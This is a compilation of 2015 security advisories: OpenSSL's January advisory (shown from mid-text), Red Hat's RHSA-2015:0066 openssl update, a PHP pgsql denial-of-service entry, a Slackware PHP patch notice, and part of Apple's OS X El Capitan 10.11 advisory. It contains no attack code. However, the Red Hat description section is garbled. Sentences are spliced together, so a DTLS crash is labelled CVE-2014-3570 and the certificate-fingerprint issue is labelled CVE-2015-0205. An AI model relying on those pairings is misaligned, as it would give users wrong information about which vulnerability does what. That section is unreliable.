RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
DH client certificates accepted without verification (CVE-2015-0205)
====================================================================
This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssl security update
Advisory ID: RHSA-2015:0066-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html
Issue date: 2015-01-20
Updated on: 2015-01-21
CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572
CVE-2014-8275 CVE-2015-0204 CVE-2015-0205
CVE-2015-0206
=====================================================================
1. Summary:
Updated openssl packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),
Transport Layer Security (TLS), and Datagram Transport Layer Security
(DTLS) protocols, as well as a full-strength, general purpose cryptography
library.
A NULL pointer dereference flaw was found in the DTLS implementation of
OpenSSL. A remote attacker could send a specially crafted DTLS message,
which would cause an OpenSSL server to crash. A remote attacker could send
multiple specially crafted DTLS messages to exhaust all available memory of
a DTLS server. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a
non-ephemeral key even when the ephemeral ECDH cipher suite was selected.
An attacker could use these flaws to modify an X.509 certificate to produce
a certificate with a different fingerprint without invalidating its
signature, and possibly bypass fingerprint-based blacklisting in
applications. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which
contain a backported patch to mitigate the above issues. For the update to
take effect, all services linked to the OpenSSL library (such as httpd and
other SSL-enabled services) must be restarted or the system rebooted.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix
1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues
1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-1.0.1e-30.el6_6.5.ppc.rpm
openssl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm
openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-1.0.1e-30.el6_6.5.s390.rpm
openssl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390.rpm
openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm
openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm
openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm
openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-30.el6_6.5.src.rpm
i386:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-1.0.1e-30.el6_6.5.i686.rpm
openssl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0389 | CVE-2015-1352 | PHP PostgreSQL Extended denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate token extraction for table names, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted name. PHP is prone to a denial-of-service vulnerability due to a NULL-pointer dereference condition.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor) is an open source general-purpose scripting language jointly maintained by the PHP Group and the open source community. PostgreSQL (aka pgsql) is the PHP extension for the PostgreSQL object-relational database management system. The vulnerability is caused by the program not correctly validating the 'token' extracted from the table name.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. |
+------------------------------------------------------------------------+
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Xiaolong Bai of
Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was addressed through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
